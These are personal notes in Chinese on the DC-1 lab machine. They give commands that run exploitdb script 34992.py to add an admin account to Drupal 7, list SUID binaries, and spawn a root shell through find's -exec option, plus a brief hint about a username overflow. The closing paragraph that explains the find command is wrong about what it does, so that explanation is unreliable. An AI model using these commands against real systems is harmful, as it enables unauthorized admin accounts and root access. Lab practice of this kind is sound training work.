DC-1 find提权/sql数据库创建用户（个人笔记）

进入数据库select * from users\G;　　\G为了让界面看着更整洁

 

在exploitdb中有一个针对Drupal 7版本的攻击脚本，可以增加一个admin权限的用户账号：

终端/msf输入：searchsploit drupal

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://url -u admin3 -p admin3　　　　创建成功账号：admin3  密码：admin3

// 使用它一个 Python 脚本的命令行，它将运行名为"34992.py"的 Python 脚本，去创建用户

 

6.flag4

根据提示passwd我们可以想到/etc/passwd　　　　列出用户表

发现flag4的提示，目标发现里面有flag4,给了个路径/home/flag4

首先试试SUID提权

查看默认以root权限执行的程序：find / -perm -u=s -type f 2>/dev/null　　　　

或者尝试：

1. 查找具有root权限的文件命令：  find / -perm -4000（表示具有执行权限的） 2> /dev/null（避免错误输出的命令）

find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)

 

看到find就在其中，那就比较简单了。直接使用find提权

find /var/www -exec "/bin/sh" \;　　　　别忘记添加引号

最终cd 切换到root用户，ls查看到最终的flag，cat打开

 

 

这行 Linux 代码是用来在 /var/www 目录中执行一个命令的。具体来说，它使用 find 命令来查找 /var/www 目录中所有可执行文件，然后使用 -exec 命令将这些文件的路径传递给 /bin/sh 命令，以便在这些文件中执行命令。

具体来说，find 命令将查找 /var/www 目录中的所有可执行文件 (以 .sh 或 .sh.exec 结尾),然后使用 -exec 命令将这些文件的路径传递给 /bin/sh 命令，以便在这些文件中执行命令。/bin/sh 命令是一个通用的 shell 命令，它可以打开一个终端窗口，以便用户与程序交互。

总的来说，这行代码的目的是在 /var/www 目录中查找所有可执行文件，并在这些文件中执行命令。这个命令可以被用于脚本、自动化任务或其他需要操作文件或目录的场合。

 

 注：

1. 如果定义了！strncmp。可以使用溢出来操作     用户名AAAAAAAAAAAA（溢出成分）/bin/sh